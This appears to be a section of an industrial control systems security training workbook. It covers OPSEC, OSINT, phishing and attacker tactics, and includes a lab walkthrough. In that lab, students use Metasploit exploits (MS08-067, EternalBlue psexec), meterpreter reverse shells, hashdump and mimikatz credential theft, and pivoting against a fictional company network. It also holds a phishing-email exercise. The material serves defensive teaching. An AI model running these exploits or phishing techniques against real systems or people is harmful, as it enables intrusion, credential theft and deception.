 Critical Infrastructure and control systems are increasingly
popular targets
Threat example
HMIs for a ski lift in Austria were left open on the Internet. If an attacker got a hold of these HMIs, they
can control the cable tension, distance between cable cars, speed, and direction of the lifts.
The same day as the Austrian ski resort closed to patch its HMIs, a “malfunction” with the same HMI and
controls vendor in Gudauri, Georgia happened. Coincidence?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
121 | P a g e
ICS incidents
Below is a series showing FireEye’s ICS Key Incidents Timeline. It shows that ICS’s are becoming
increasingly targeted over time.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
122 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
123 | P a g e
In the January 2019 Worldwide Threat Assessment Report, the Director of National Intelligence calls out
specific countries as actively mapping our Nation’s critical infrastructure for the purpose causing
substantial damage to our way of life.
Foreign adversary attacks have increased so much that on May 1, 2020, President Trump signed an
executive order, and declared a state of emergency to protect the US power grid from foreign attacks.
“[Nation States are] mapping our

critical infrastructure with the long-
term goal of being able to cause
substantial damage.”
- DNI
They are not targeting my network. But what if they already know it better than you? What can they do?
__________________________________________________________________
__________________________________________________________________
__________________________________________________________________
__________________________________________________________________
__________________________________________________________________
Bowman Avenue Damn
Purpose: Kept basements from flooding in a suburban
neighborhood
Details: Began operation in 2013
Sluice gate: 15 ft. wide 2.5 ft high
SCADA system running a modern and complex array of
sensors in the brook used to automatically control the
sluice gate adjusting flow rate accordingly.
Specifics: Found by scanning the Internet for SCADA
systems – Connected via cellular modem. Attacked by
Iran’s Revolutionary Guards Corps.
The attack failed. American investigators were nevertheless disturbed because the attempt indicated that
hackers could take control of computer-operated infrastructure.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
124 | P a g e
Operations security (OPSEC)
 Military origins – “Loose Lips Sink Ships”
 It is a process, NOT a set of rules
 Identify Critical Information
 Analyze threats
 Analyze vulnerabilities
 Assess risks
 Apply countermeasures
 Physical and cyber applications
 Should be part of your cybersecurity plan
 Should be integrated and synchronized throughout the organization
Identify critical information (CI)
“There’s a lot of information out there on my organization. So what? It’s just random bits of data that don’t
mean anything …”
 Data are transformed into
intelligence. The operational
environment / business
generates data. Patterns are
identified in the data turning it
into information. Context can
be added to information to
transform it into intelligence.
 What information is considered
critical?
 Information about intentions,
capabilities, and activities that
allow an adversary to
effectively plan to disrupt
operations.
 Identifying CI can be difficult.
 Bits of information are puzzle pieces

 Even your small bits help complete
the picture
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
125 | P a g e
Identify CI (continued)
 A critical information list (CIL) can be
created to help categorize and
prioritize data.
 Customer data, passwords, network
information, device configurations,
data for analysis, etc., are examples of
critical information.
 The CIL should be fluid.
 Employees should be trained on how
to secure the items on the CIL.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
126 | P a g e
 Determining what is critical
for your organization
requires a thorough
understanding of how the
organization operates.
 Ask: If available, would
this bit of information be a
risk to the success of the
organization or product or
the security of your
customers or employees?
 Check your information
sources and destinations.
Identify and document
where CI is found within
business processes.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
127 | P a g e
Open-source intelligence (OSINT)
OSINT is gathering information from publicly available sources to be used in an intelligence context.
80% of all intelligence is unclassified.
There are many tools and techniques available for gathering and organizing information. We will
introduce you to a few of the tools and techniques to highlight how and what types of information can
be gathered about an organization.
 Tools and techniques:
 Social media
 Internet Archive
 Builtwith
 Robots.txt
 Scans.io / Shodan
 Maltego
 Networking tools Nmap, nslookup, dig, etc.
 It’s not just what you put out there, but what is publicly available
about you (e.g., FCC, regulatory info, contracts)
 Antennasearch – Strava
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
128 | P a g e
Social media
Social media is an important piece in an organization’s OPSEC
plan. Social media users tend to be more open about their
thoughts and can end up sharing sensitive company
information. Take a few minutes to review Elliott Tessermick’s
twitter posts (CEO of Acme).
 Open the Firefox browser
 Go to the following URL:
https://twitter.com/acmechem
 Do you see anything that may have a potential
negative impact to Elliott or Acme Inc.?
OSINT framework
OSINT framework is a collection of some of the most used
OSINT gathering tools compiled into one handy website.
 www.osintframework.com
 The Go To tool for OSINT searches
 Collection of OSINT tools
 Open-source on GitHub
Google hacking (Dorks)
Google has advanced search operators to help refine search
results. Originally created for Search Engine Optimization
(SEO) tasks, the advanced operators can return information
that is not easily found through default searches on Google.
There are approximately 30 advanced search operators
available. The list changes as Google adds or deprecates
operators.
The advanced operators enable people to find sensitive
documents, code, and even vulnerable devices and services
on the Internet. Security researcher Johnny Long brought the power of the advance operators to light.
Long said they revealed “foolish” companies on the Internet, for which he coined the term “Google
Dorks.” The term Google Dorks, or Dorking is now synonymous with Google Hacking.
The Google Hacking Database (GHDB) was created from Johnny Long’s project to index dorks who
applied to finding devices and security vulnerabilities. The GHDB is currently hosted by exploit-db and
is still heavily used and contributed to today. You can use these advanced operators to look for
sensitive information about your organization that may be exposed.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
129 | P a g e
Physical OPSEC
Most of us are probably familiar with the “Three Gs” of physical security — gates, guards, and guns.
Gates, guards, and guns are necessary in some places, but these physical deterrents do not do much
good if proper attention is not given to them. OPSEC definitely applies to physical security as well and
should be considered by everyone in the organization.
Here are some tips on things to watch out for:
 Monitor who is entering your facilities, Check
identification, and escort visitors.
 Report broken doors, windows, locks, etc.
 Inventory keys, badges, access cards, uniforms,
vehicles, etc.
 Clear workspaces of PII (personally identifiable
information) and other sensitive information that is
no longer needed.
 Perform regular walkthroughs and inspections
Hawaii Emergency Management Agency OPSEC Exercise

Take any notes from the online activity:
_______________________________
_______________________________
_______________________________
__________________________________
_______________________________________________
_______________________________________________
If you know the enemy and know yourself, you need not fear the result of a hundred battles.
If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.
If you know neither the enemy nor yourself, you will succumb in every battle.
— Sun Tzu, The Art of War
Understand your capabilities and your adversary’s. You cannot afford to ignore threats.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
130 | P a g e
Threats, vulnerabilities, risk
Analyze threats
Threats come from adversaries and consider intent, capability, and
opportunity. The greater the combined intent and capability of an
adversary, the greater the threat.
Understand how you fit in the picture (you may not be the main
target, but a path to the desired target).
Keep up to date on the latest threats, hacks, and exploits, along
with trends in cyber and physical security. Use information sources
such as Threat Intelligence feeds, ISACs, US-CERT, infraguard,
DNI reports, etc., to learn about threats and associated indicators.
Revisit your CIL. What is defined as CI may depend to a degree on the threats you are facing. Change
your context while reviewing the CIL.
Attack is the secret of defense; defense is the planning of an attack.

— Sun Tzu, The Art of War
Think like an adversary – know your weaknesses!

Analyze vulnerabilities
In simple terms, threat can be thought of as the strength of the adversary, and vulnerability the
weakness of an organization. Identify OPSEC indicators and compare them against the adversary’s
intelligence gathering capabilities. How would someone exploit the network, employees, or operations
to get inside and do damage? IT and OT leaders should be sure they know the network in order to
determine its potential flaws. Employees should be aware of potential social engineering attacks. Every
machine should be audited regularly to ensure it is free of spyware and malware.
Assess risk
Risk is based on the amount of harm a vulnerability may allow if exploited by an adversary, combined
with the probability of the vulnerability being exploited.
Threat Level + Vulnerability Level + Exploit Probability
The probability of compromise is greatest when the threat is very capable and dedicated, while friendly
organizations are simultaneously exposed. Threats range from low to high. Once you know what kind of
security threats you have and where your most vulnerable areas are, you can determine the risk and
what needs to be done. Analyze vulnerabilities along with available countermeasures. You can
outsource your operations, but you cannot outsource your risk!
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
131 | P a g e
Apply countermeasures
OPSEC planning is useless without OPSEC application. Threats are different for different
organizations, but every identified weakness or vulnerability deserves focused attention. Whether you
are implementing policy improvements or buying a new security appliance, the costs of good security
are generally far less than the costs of a breach or production outage. Doing something is better than
doing nothing.
Below are recommendations for an OPSEC Plan — the format is organization-specific; however, plans
should generally include:
 References
 General mission/program description
 Security responsibilities
 Critical information list (CIL)
 Indicators
 Threat
 Vulnerabilities
 Risk determination
 Countermeasures
 Management decision on which countermeasures to implement
 Public affairs
 Training
 Supporting units/associated programs
 Resources utilized
OPSEC, OSINT recap

 What company IP addresses, subdomains, ports. and services are externally exposed?
 What technologies, operating systems, applications, and other company infrastructure details
can be identified externally?
 Are externally facing machines regularly audited for vulnerabilities?
 Has information that is critical to your business, along with information owners, been identified
and documented on a CIL?
 What is the extent of exposed personal information? Is information such as employee names,
email addresses, social profiles, physical addresses, and phone numbers easily discovered
from an external source?
 Are badges, keys, and uniforms inventoried?
 Are facility walk downs performed?
 Are employees trained on OPSEC practices?
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
132 | P a g e
Common issues/findings associated with OPSEC/OSINT include:
 Content published by the organization is not reviewed for security risks and sensitive
information
 No password policy, potentially leaving default passwords on Internet connected devices.
Passwords on sticky notes
 Social media posts revealing sensitive company information
 No governance on system deployments resulting in unidentified assets potentially open
externally
 Use of unsupported or unpatched software on external systems
 Flat network architecture and use of routable IP addresses exposing control systems externally
 Use of non-company owned devices accessing information systems
 Staff are not trained on OPSEC and cybersecurity issues
 Laptops are not protected from loss outside of the facility, No full disk encryption
 Physical access is not monitored
 Computing equipment tossed in the trash without proper data destruction or sanitization
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
133 | P a g e
Evaluate adversarial risk
Continuing on with assessing risk to the business, this section will evaluate adversarial risk.
Normally, risk assessment is a determination of quantitative or qualitative risk related to a well-defined
situation and a recognized threat based on magnitude of potential loss, and the probability that loss will
occur. However, in evaluating adversarial risk we will be looking at various ways an aggressor looks at
and traverses a victim's network to identify potential attack targets and paths to achieve their goals.
Armed with this
aggressor
perspective, it is
easier to identify
and apply
appropriate
mitigations to
minimize
adversarial risk.
Adversarial tactics and techniques

Attackers use several tactics and techniques to initially access and then move through a network.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
134 | P a g e
Initial access and execution
 Exploitation
 _______________________________________________
 _______________________________________________
 Phishing (with malicious attachment, URL, or instructions)
 ________________________________________________
 ________________________________________________
 ________________________________________________
 ________________________________________________
 Supply chain compromise – attack originates from a trusted
partner relationship (also known as island hopping)
 Insider – one who already has trusted credentials
 Compromised or brute forced credentials – easily guessed or
default password
As already noted, there are many ways to get initial access to a system. Some require user interaction,
some do not. By far the easiest way is through email phishing. A well written phishing email message is
relatively easy to deliver but hard to defend against. The 2019 Verizon Data Breach Investigations
Report states that “the median company received over 90% of their detected malware by email.” The
report also states the “click rate” from combined results of multiple security awareness vendors is 3%,
which means that 1 in 30 users will click on any given phishing email. Unfortunately, an aggressor only
needs one person clicking to be successful.”
Phishing exercise
Review the ACME Shipping leadership bios located below. Then, bring up your
favorite email client and try to compose an effective phishing email targeting one of
Acme Shipping staff. After creating your phishing email, send it to ics401v@inl.gov
for feedback.
Criteria for a ‘good’ phishing email
 Sense of urgency
 Appears to come from a trusted source
 Includes information regarding something the target is involved in or passionate about
 Good grammar, proper punctuation, and NO misspellings!
 More is less (simple can sometimes be more effective)
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
135 | P a g e
Acme Shipping Webpages:
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
136 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
137 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
138 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
139 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
140 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
141 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
142 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
143 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
144 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
145 | P a g e
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
146 | P a g e
Adversarial tactics and techniques
 Account takeover / manipulation
 ________________________________
 ________________________________
 ________________________________
 Startup / logon applications and scripts
 Services
 Scheduled tasks
 Modified system files
 Directory search order hijacking
 Hidden files and directories
Persistence, or how to maintain a presence on a network.

This can be the creation of new user accounts, adding or modifying user permissions, and creating or
using remote access credentials.
Startup applications and scripts can also be used. In Linux there are the rc.local, .bash_profile and
.bashrc files that can be modified. In Windows, the two main locations to insert startup applications are
the Windows “run” and “runonce” registry keys. Another method for persistence is adding a scheduled
task using the Widows “at.exe” and “schtasks.exe” applications. The Linux application is crontab.
Other persistence methods include adding a system service that starts automatically, or modifying
common system files or by placing malware that has the same name as a system file in a directory that
is searched before the directory that contains the actual system file. It is also possible to “hide” files so
they do not appear in normal file listings. In Windows this is the attrib.exe command and in Linux you
simply start the filename with a period.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
147 | P a g e
 Access token manipulation
 ___________________________________
 ___________________________________
 Crack password hashes
 ___________________________________
 ___________________________________
 Bypass user account control
 Exploit of a privileged process
 Sudo
 Keystroke logger
Privilege escalation and credential access can be accomplished in several ways.
Kerberos authentication systems (which Windows and some Linux distribution utilize) employ a key
distribution center (KDC). The KDC issues a ticket-granting ticket (TGT), which is time stamped and
encrypts that ticket using the ticket-granting service's (TGS) secret key and returns the encrypted result
to the user's workstation. A “Golden Ticket” is a Kerberos authentication ticket for the TGT account, a
special hidden account with the job of encrypting all the authentication tokens for the Windows Domain
Controller. If an aggressor can forge a golden ticket it can be valid for as many as 10 years.
Pass the hash is a method of authenticating to some Windows services using only a user’s password
hash which can be stolen from a user system or intercepted from monitoring network traffic.
John the ripper is a free password hash cracking software tool that runs on 15 different platforms and
combines several different password crackers into one package.
Rainbow tables are basically huge sets of precomputed tables filled with hash values that are pre-
matched to possible plain text passwords.
A User Account Control (UAC) bypass is when an application gains full administrative privilege through
a backdoor without triggering the UAC notice that requires the user to click the Yes button in the UAC
window.
When initially gaining access to a system, an adversary may be operating within a lower privileged
process which will prevent them from accessing certain resources on the system. Vulnerabilities may
exist, usually in operating system components and software commonly running at higher permissions,
which may be exploitable to gain higher levels of access on the system.
Sudo is a Linux command that allows a user to run a program as another user, usually the root user.
Sometimes this function is implemented without prompting for a password.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
148 | P a g e
A keystroke logger records keyboard output that can be examined for usernames and passwords later
by an attacker.
 System tools
 Authorized user credentials
 Binary padding
 Disable security tools
 Group policy modification
 Obfuscated files or information
 Process injection
 Rootkits
 Timestomp
All system tools installed on a compromised system are available to an attacker. Tools such as DOS
commands, remote desktop, active directory applications, VPN’s, etc. can be used without needing to
download additional tools. Stolen or aggressor created user accounts can be leveraged to use system
tools.
Attackers may add data to files to increase the size beyond what security tools are capable of handling
or to change the file hash to avoid hash-bashed blacklists.
Aggressors can also disable installed security tools (e.g., anti-virus software) to avoid possible
detection.
Aggressors may modify or add group policies to subvert access controls.
They may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding,
or otherwise obfuscating its contents on the system or in transit.
Process injection is a method of executing arbitrary code in the address space of an existing process.
Running code in the context of an existing process may allow access to the process's memory,
system/network resources, and possibly elevated privileges.
Rootkits are programs that hide the existence of malware by intercepting and modifying operating
system API calls that supply system information.
Timestomping is a technique that modifies the timestamps of a file (modify, access, create, and change
times), often to mimic dates and times of files that are in the same folder.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
149 | P a g e
Victim host discovery
 Domains, users, groups and credentials
 Applications and services
 Files and directories
 Network connections
 Network shares
 Screenshots
 Histories/logs
IPs and hostnames
 ARP query/scanning
 Limited port scanning
 Hostname enumeration
 DOS net view
 Domain controllers (Active Directory)
 DNS zone transfers
 DNS lookup
Pivot points
Attackers will try to enumerate domain names, users, group membership and passwords and hashes.
This can be done by querying the local users database or a domain controller. Once the attacker has
sufficient access rights, they can create and modify accounts, move users into and out of groups,
change passwords and access network resources. If single sign-on is the only authentication method,
then the attacker can access all computing resources of a duly authorized user. Looking at network
connections gives the attacker an idea of what is accessible. Data files can be exfiltrated and reviewed
offline, which may contain valuable information. Access to email data gives the attacker information to
generate more successful phishing campaigns. Screenshots gives an indication of what a user is doing
without logging onto the system. Browser and other applications histories gives an indication what
resources a user accesses, and in some cases may contain credentials. Information from network
connections gives the attacker additional targets. Once the attacker gains credentials, all the normal
system tools on the host can be used by the attacker.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
150 | P a g e
The Address Resolution Protocol (ARP) cache is a simple mapping of IP addresses to MAC addresses.
Each time a computer’s TCP/IP stack uses ARP to determine the Media Access Control (MAC) address
for an IP address, it records the mapping in the ARP cache so that future ARP lookups go faster. By
querying the ARP cache an attacker can find additional targets on the same subnet the attacker may be
able to compromise.
A method by which an attacker can send out ARP requests to all IPs on a subnet. The ARP request is a
packet sent out on the network asking the question “Who has IP x.x.x.x and if there is a host on the
subnet with that IP it will respond with “I have IP x.x.x.x and my MAC is xx:xx:xx:xx:xx:xx”. The first
three bytes of the MAC address are assigned to manufacturer of network interfaces and many ARP
scanners will look up the manufacturer using the those first three bytes and display it along with the IP
and the MAC address. There is so much ARP traffic on a network that most IDS’s do not look at ARP
traffic and thus the attacker can get all IP’s of responding hosts on a subnet in a matter of seconds with
very little chance of being detected.
To avoid detection an attacker may do limited, very slow, port scanning to find hosts running some
service to help determine what a host is and/or what a host is used for. For example, doing a limited
scan for open Port 445 may reveal which hosts on a subnet are Windows hosts. Doing a limited scan
for Port 80 or 443 might reveal which hosts are running web services. Running a limit port scan on Port
502 would possibly reveal hosts running Modbus, and Port 20000 normally indicates DNP.
Hostname enumeration is often overlooked by network defenders; however, hostnames can give
attackers targets without ever needing to do port scanning. Many company’s name their Windows
domain controllers with the letters AD (for Active Director) somewhere in the name. In control systems it
is not uncommon to name a PLC with plc in the name, or HMI and other names that can help attackers
zero in on specific targets. Hostnames can be queried from Windows operating systems using the DOS
net view command or there are ways to query a domain controller to give out the names of hosts that
are associated to the domain. If enabled, an attacker can do a DNS zone transfer which will retrieve the
entire DNS table. If that does not work, then the attacker can do DNS lookups using IP addresses
found in an ARP scan. Once an attacker knows the IPs, manufacturers and hostnames targeting other
systems becomes much easier.
Pivot points are the points in a subnet that allows network traffic to other subnets. Sometimes these
points are referred to as network bridges. These bridges can simply be a host with multiple network
interface cards, or routers or firewalls. For attackers to pivot into other subnets, they need to find these
bridges and circumvent any security preventions.
Let’s look at host discovery more closely using the Linux arp-scan program. Arp scanning can only
discover hosts that are within the same subnet, which means the arp-scan must be executed from a
host on the same subnet as the hosts being queried.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
151 | P a g e
Host discovery tools
Here are various ways to collect hostname information. Some services such as DNS can be restricted
to not allow zone transfers, so they may nor may not give any useful information.
 Windows/DOS Commands
 net view – Lists windows host names within the same domain
 nslookup <IP address> – lists the hostname associated with the IP address
 systeminfo – lists system information (Windows XP and newer)
 sc – Service Control – Create, Start, Stop, Query or Delete any Windows service
 Linux Commands
 dig axfr <domain.name> @<dns_server> – DNS Zone transfer that dumps the entire DNS
 (try classroom.edu and 1.2.3.5)
 nslookup <IP address> – lists the hostname associated with the IP address
 arp-scan <IP addresses>
 Metasploit modules – Use the info command with these modules for more information
 auxiliary/scanner/smb/smb_version
 auxiliary/gather/enum_dns
 post/windows/gather/enum_computers
 post/windows/recon/computer_browser_discovery
Host discovery exercise

This exercise will cover how to exercise will cover how to use different host
discovery techniques to map the target network.
NOTE: This exercise is done virtually using Netlab. Before completing this
exercise, view the Netlab “How to” video located in this course.
1. Open https://ics-labs.inl.gov in a new window/tab to avoid closing your VLP
session.
2. Login and schedule a reservation for the LO8 exercise.
Lab Settings
The information in the table below lists the basics of the environment.
Kali Auto Logged in - root Auto Logged in - toor
To begin the exercise, click the Kali Linux Host in the diagram or on the tab listed at the top. Then,
enter the password from the above table if required.
152 | P a g e
NOTE: Please write down what you find during this hands-on exercise. Will be asked a few
questions after you complete this exercise that you will need to answer correctly with the information
you collect in order to continue your training.
You have been given SSH access to an Acme Shipping Linux host accessible from the Internet from a
hacker colleague. To maintain some persistence your colleague created an SSH certificate and
installed it on the host. The host IP address is 10.20.3.52. The IP address of the Kali Linux host you are
using is 10.2.3.101.
1. Open a terminal window and run the following command:
ssh 10.20.3.52
Notice that with the SSH certificate you do not need to supply a password.
What is your username access? ________________________________
What is the name of the host? _________________________________
Based on the hostname, what is it used for? ______________________
2. Look around and see what you can find. Commands to try:
List files: ls
Current directory: pwd
List network adaptors: ifconfig
List network connections: netstat -pantu
What is this host’s real IP address? _____________________________
What other username has logged into this host in the past? (hint: try looking in the /home
directory) _________________________________________________
What other interesting data can be found on this host? ________________________________
__________________________________________________________
3. Time to do reconnaissance. DONNOT use Nmap. If you don’t know what you are doing Nmap is
very noisy and you will get caught. Let’s start by using arp-scan, type:
arp-scan 10.10.10.0/24
How many IP’s responded? ____________________________________
What IP’s were discovered? ____________________________________
4. Let’s find out which of these are Windows hosts. We could us Nmap, but that can be noisy, so
we will use a Metasploit module.
5. Exit the SSH connection to this host by typing exit and then pressing enter.
6. In the Kali terminal window run the following python script file
NOTE: this is a custom script not a standard Kali nor bash command:
./tunnelacme.py
153 | P a g e
This script does all the work to create an SSH tunnel between your Kali host and the Acme
Shipping Linux server that gives you access directly into Acme Shipping’s network. You should
see a line that says: **** Setting up SSH Tunnel(s) ****
Below this are lines indicating what happened.
First, a virtual network interface on the remote host was created named tun4 and assigned an
IP address of 10.1.2.1. It then created a virtual network interface on the Kali host named tun3
and assigned it the IP address 10.1.2.2. Next a route was added on the Kali host to the internal
Acme Shipping network address range of 10.10.10.0/24 to route through IP address 10.1.2.2.
Finally, two entries were made into iptables on the Acme Shipping host to do IP forwarding into
the Acme Shipping network.
7. Let’s verify all this. Type the following command:
ifconfig
You should see the tun3 entry with the IP address 10.1.2.2.
8. Now the route command.
route -n
At the bottom of the list you should see the Destination address range 10.10.10.0 should be
forwarded through the tun3 interface.
9. Check to make sure the tunnel is up by trying to ping the Linux host:
ping -c 3 10.10.10.52
You should get three successful ping lines.
10. Now bring up msfconsole by clicking the msfconsole button on the tool bar:
11. There are lots of Windows exploits so let’s find which of the harvested IP’s are Windows hosts
by using a module named smb_version. Type the following two in msfconsole:
use auxiliary/scanner/smb/smb_version
options
You can see various options, but the only one we need is to set RHOSTS to our identified IP
addresses. We already know that 10.10.10.52 is a Linux host so type:
set RHOSTS 10.10.10.1,10,20,21,22,23,35,45,254
We will leave the rest of the options as they are. Now type:
run
12. What is nice about this module is that it also tells us what version of Windows is running along
with the hostname!
13. List the host names, IP’s, and Windows versions:
154 | P a g e
14. Fortunately, there are some Windows XP hosts listed and there are a bunch of XP exploits.
Let’s pick one and try an SMB exploit on it. This is probably not the first one in your target list,
however it would be nice to get some credentials from possibly a less secure host first. Type the
following commands:
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.2.3.101
set LPORT 443
Why did we pick LPORT to be 443? Because the default LPORT of 4444 is a well-known
Metatsploit port and there might be firewall rules that only let common Internet ports out.
15. Now type:
run
If everything went well, you should see something similar to the following on your screen:
[*] Started reverse TCP handler on 10.2.3.101:443
[*] 10.10.10.21:445 - Automatically detecting the target...
[*] 10.10.10.21:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 10.10.10.21:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 10.10.10.21:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.20.3.1
[*] Meterpreter Session 1 opened (10.2.3.101:443 -> 10.20.3.1:1198)
meterpreter >
16. Run some commands:
getuid
What user context are you connected to? ________________________________
netstat
What IP is this host connected to on which ports? __________________________
ifconfig
How many network interfaces are there? _________________________________
155 | P a g e
17. Can you harvest credentials? Try this following command:
hashdump
What happened and what did you get? ___________________________________
18. Can you get cleartext passwords? Try:
load mimikatz
wdigest
19. Let’s try and query the domain controller for more usernames by typing (you may get some
funny characters on the screen; this is because you are connected as system instead of a user):
background
use post/windows/gather/enum_domain_group_users
set GROUP Domain Users
set SESSION 1
run
___________________________________________________________________
___________________________________________________________________
___________________________________________________________________
___________________________________________________________________
20. Let’s look at the Domain Admins group by typing:
set GROUP Domain Admins
run
___________________________________________________________________
Is there anything that you can use? ______________________________________
21. Time to pick a new target. There are two targets that are worth investigating more, AD and
FILE-SERVER. You already have a user with Domain Admin credentials, so let’s pick FILE-
SERVER, which is a Windows 2016 Server host. A good exploit to try is another SMB exploit
commonly known as Eternal Blue, and you don’t need the administrator password, all you need
is the password hash that you harvested above, so scroll back up and find the password hash
and copy it and then you can simply paste it instead of trying to type all those characters.
Type the following:
use exploit/windows/smb/ms17_010_psexec
set RHOST 10.10.10.45
set SMBDomain acmeshipping.com
156 | P a g e
set SMBUser administrator
set SMBPass
ecd5cf4324c2be3caad3b435b51404ee:b2114ab23e8dcff09c151d08026a219b
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.2.3.101
set LPORT 443
run
NOTE: If no session was created, type run again.
22. Now it is time to try grabbing more passwords! Even though you have the Administrator
password hash, a quick way to see if you have the proper permissions is to run the Meterpreter
built in hashdump command:
hashdump
23. On newer versions of Windows, you may get an error even though you have SYSTEM level
privileges. The way to get around this is to migrate the Meterpreter session to a different
process with the migrate command. First, you need to see what processes are running by
typing:
ps
24. Next pick a process such as winlogon.exe or services.exe. The process ID or PID is the far left
column of numbers and then type:
migrate <pid>
25. After the migration is successful you can load mimikatz, but because this is a newer version of
Windows, you will need to use a newer version of mimikatz named kiwi, so type:
load kiwi
And then:
creds_wdigest
26. Success! What is the Administrator password you got without decrypting the password hash?
_____________________________________________________________________
27. Now for more reconnaissance. Try using the following commands:
sysinfo
ipconfig
netstat
What did you find that can be leveraged as additional targets?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
157 | P a g e
_____________________________________________________________________
_____________________________________________________________________
28. Background the Meterpreter shell by typing background.
29. With a direct connection into Acme Shipping’s network and with users credentials it is possible
to use remote desktop to remotely login to hosts within the corporate network. As a reference:
Windows Server installations allow for two concurrent login sessions. Open a new terminal
window by clicking the Terminal menu options at the top of the screen and then selecting “New
Window” and then within the new bash window type (the -g 80% tells rdesktop to 80% of the
screen to display the remoted desktop):
rdesktop -g 80% 10.10.10.45
NOTE: Type “yes” for the “Do you trust this certificate”
You can try of the usernames and passwords you have collected to login.
Another reference: You can use remote desktop within a remote desktop to login to other hosts.
To close rdesktop, simply close the window.
30. If you did your homework properly you noticed there is an open connection from 10.10.10.45 to
host 192.168.0.7 on Port 445, and Port 445 is, of course, SMB. Do you know the name of the
192.168.0.7 share? If you do not, how would you find it? (hint: try using the net use command
within a DOS command shell or use file explorer within remote desktop).
31. Looks as if you have maybe found a pivot point into another network. We can use some of the
Metasploit modules you’ve already use to investigate this new target, however you will need to
tell msfconsole the route to this new subnet by using the route add command:
route add 192.168.0.0/24 <session id>
NOTE: you will need the session number for the Meterpreter session open to
10.10.10.45. You can get it through the msfconsole sessions command.
use auxiliary/scanner/smb/smb_version
run
What did you find?
_____________________________________________________________________
32. This looks like an interesting target. To attack the host, type the following:
use exploit/windows/smb/ms17_010_psexec
NOTE: msfconsole remembers what options you set previously:
options
33. After verifying the options, type:
158 | P a g e
run
34. To get back into msfconsole type background.
35. Now that you have a session open to 192.168.0.7 you need to change the msfconsole routing,
so the packets go directly into this subnet using this new session.
NOTE: you can just use the up arrow to find the previous route command and
modify it.
route del 192.168.0.0/24 <session id to 10.10.10.45>
route add 192.168.0.0/24 <session id to 192.168.0.7>
36. Reconnaissance time again. Type the following:
use post/windows/gather/arp_scanner
set RHOSTS 192.168.0.0/24
set SESSION <session id to 192.168.0.7>
run
What IP’s did you find that can be leveraged as additional targets?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
If no hosts are displayed after a minute, there may be a problem with your Meterpreter shell.
The easiest way to check is to type ctrl/c to stop the arp_scanner module and then check the
Meterpreter session as follows replacing <session #> with the appropriate session number:
sessions -i <session #>
getpid
If the command errors out type exit and go back to Step 32 above and continue forward.
That completes this exercise, but you can look around using some of the other tools discussed
in the lecture and see what else you can find.
159 | P a g e
Adversarial tactics and techniques (continued)
 Stolen or fabricated credentials
 ___________________________________
 ___________________________________
 ___________________________________
 System tools
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 ___________________________________
 Exploitation
 ___________________________________
 ___________________________________
 ___________________________________
Some of these examples we have already discussed, but they continue to be relevant when acquiring
additional systems.
With valid credentials, especially administrator or root credentials, the attacker can access other
resources. In some cases, password reuse can come into play. For example, a user may have access
to Windows and Linux hosts that may use the same password for both operating systems. In some
environments all hosts authenticate to a central authentication system. For example, in a mixed
Windows and Linux environment it is possible force all authentication to be handled by the Windows
domain controller. Most users hate to have to authenticate every time they need to access a network
resource. In the ICS environments it may not be feasible to force users to individually log into systems,
and a shared login and password is implemented. In a Widows environment, when accessing SMB
services, it is possible to authenticate using only the password hash.
With single sign-on any resource the account has access to the attacker has access to also. It is quite
simple to access network file shares simply using the DOS net use command and then whatever is
available on the network share the attacker has access to. With administrator credentials the hidden
network C$ and ADMIN$ shares can be mounted, accessed, and manipulated. The attacker can
download sensitive files or upload malicious files that other uses can access.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
160 | P a g e
